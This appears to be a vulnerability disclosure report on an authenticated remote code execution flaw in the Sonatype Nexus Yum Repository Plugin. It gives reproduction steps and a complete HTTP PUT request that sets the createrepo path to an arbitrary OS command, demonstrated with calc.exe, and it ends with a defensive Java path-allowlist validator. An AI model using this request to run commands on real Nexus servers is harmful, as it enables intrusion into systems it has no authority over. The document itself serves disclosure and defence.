### Maven artifact

groupId: org.sonatype.nexus.plugins
artifactId: nexus-yum-repository-plugin
version: 2.14.9-01

### Vulnerability

#### Vulnerability Description

The Nexus Yum Repository Plugin is vulnerable to Remote Code Execution. All instances using CommandLineExecutor.java with user-supplied data are vulnerable, such as the Yum Configuration Capability.

#### Additional Details

Source File and Line Number: https://github.com/sonatype/nexus-public/blob/release-2.14.9-01/plugins/yum/nexus-yum-repository-plugin/src/main/java/org/sonatype/nexus/yum/internal/capabilities/YumCapability.java#L121

#### Steps To Reproduce:

1. Navigate to "Capabilities" in Nexus Repository Manager.
2. Edit or create a new Yum: Configuration capability.
3. Set the path of "createrepo" or "mergerepo" to an OS command (e.g. C:\Windows\System32\calc.exe).
4. The OS command should now have executed as the SYSTEM user. Note that in this case, Nexus appends --version to the OS command.

The following HTTP request was used to trigger the vulnerability:

```http
PUT /nexus/service/siesta/capabilities/000013ea3743a556 HTTP/1.1
Host: HOST:PORT
Accept: application/json
Authorization: Basic YWRtaW46YWRtaW4xMjM=
Content-Type: application/xml
Content-Length: 333
Connection: close
```

```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<ns2:capability xmlns:ns2="http://sonatype.org/xsd/nexus-capabilities-plugin/rest/1.0"><id>healthcheck</id><notes>123</notes><enabled>true</enabled><typeId>1</typeId><properties><key>createrepoPath</key><value>C:\Windows\System32\calc.exe</value></properties></ns2:capability>
```

### Supporting Material/References:

- Windows Server 2016
- Sonatype Nexus Repository Manager 2.14.9-01
- Java 8

### Wrap up

I contacted the maintainer to let them know: N
I opened an issue in the related repository: N

### Impact

An authenticated user with sufficient privileges in a Nexus Repository Manager installation can exploit this to execute code on the underlying operating system.
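The root cause above is that an administrator-supplied path is handed straight to a command executor. As an added defensive illustration (not Nexus code and not the vendor's fix), the Java 8 class below shows the kind of allowlist check such a capability should apply to the createrepo/mergerepo path before invoking anything, including the `--version` probe the report mentions; the class name and the set of trusted directories are assumptions.

```java
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Arrays;
import java.util.Collections;
import java.util.HashSet;
import java.util.List;
import java.util.Set;
import java.util.stream.Collectors;

/** Hypothetical allowlist check for a configured repo tool path (illustrative, not Nexus code). */
public final class RepoToolPathValidator {
  // The capability only ever needs these two tools; nothing else may be configured.
  private static final Set<String> ALLOWED_BASENAMES =
      Collections.unmodifiableSet(new HashSet<>(Arrays.asList("createrepo", "mergerepo")));
  private final List<Path> trustedDirs;

  /** @param trustedDirs directories the deployment trusts to hold the tools (assumed, e.g. /usr/bin) */
  public RepoToolPathValidator(List<Path> trustedDirs) {
    this.trustedDirs = trustedDirs.stream()
        .map(d -> d.toAbsolutePath().normalize()).collect(Collectors.toList());
  }

  /** Returns the normalized path when it is an allowlisted tool in a trusted directory; throws otherwise. */
  public Path validate(String configured) {
    if (configured == null || configured.trim().isEmpty()) {
      throw new IllegalArgumentException("tool path is required");
    }
    // The value is one executable path, never a command line: no whitespace or shell metacharacters.
    if (configured.chars().anyMatch(c -> Character.isWhitespace(c) || "|&;<>`$\"'*?".indexOf(c) >= 0)) {
      throw new IllegalArgumentException("tool path must not contain whitespace or shell metacharacters");
    }
    Path path = Paths.get(configured).toAbsolutePath().normalize();
    if (path.getFileName() == null) {
      throw new IllegalArgumentException("tool path has no file name: " + path);
    }
    String name = path.getFileName().toString().toLowerCase();
    String base = name.endsWith(".exe") ? name.substring(0, name.length() - 4) : name; // Windows builds
    if (!ALLOWED_BASENAMES.contains(base)) {
      throw new IllegalArgumentException("only createrepo or mergerepo may be configured, got: " + name);
    }
    Path parent = path.getParent();
    if (parent == null || !trustedDirs.contains(parent)) {
      throw new IllegalArgumentException("tool must live in a trusted directory, got: " + parent);
    }
    if (!Files.isRegularFile(path) || !Files.isExecutable(path)) {
      throw new IllegalArgumentException("tool is not an executable regular file: " + path);
    }
    return path;
  }
}
```

With `trustedDirs` set to `/usr/bin`, a value such as `C:\Windows\System32\calc.exe` from the report is rejected at the basename check, while `/usr/bin/createrepo` passes only if it actually exists there as an executable.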
1 attachment: F535957: nexus-rce-poc.mov